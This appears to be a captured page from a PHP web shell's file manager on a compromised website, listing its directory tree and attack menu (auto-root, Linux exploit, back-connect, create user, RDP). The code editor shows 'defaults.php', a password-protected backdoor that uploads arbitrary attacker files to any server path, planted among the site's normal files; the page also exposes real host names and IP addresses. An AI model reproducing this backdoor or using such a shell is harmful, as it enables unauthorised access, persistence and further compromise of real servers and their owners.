Linux webd004.cluster020.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.20.40.4 | : 216.73.216.135
Cant Read [ /etc/named.conf ]
5.4.45
jeminscrmt
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
jeminscrmt /
web /
client /
carslift-arras.fr /
www /
[ HOME SHELL ]
Name
Size
Permission
Action
a1e38
[ DIR ]
dr-xr-xr-x
administrator
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
cli
[ DIR ]
drwxr-xr-x
compat
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
libraries
[ DIR ]
drwxr-xr-x
media
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
pics
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
717
B
-r-xr-xr-x
LICENSE.txt
17.67
KB
-rw-r--r--
README.txt
4.83
KB
-rw-r--r--
defaults.php
1.29
KB
-r--r--r--
googlea78ce4b1f9f78e20.html
53
B
-rw-r--r--
htaccess.txt
6.6
KB
-rw-r--r--
index.php
12.37
KB
-r-xr-xr-x
mah.php
1.92
KB
-r--r--r--
pages.php
1.46
KB
-r--r--r--
plugins.php
1.93
KB
-r--r--r--
robots.txt
391
B
-r--r--r--
robots.txt.dist
764
B
-rw-r--r--
web.config.txt
2.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : defaults.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php echo('kill_the_net'); $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>
Close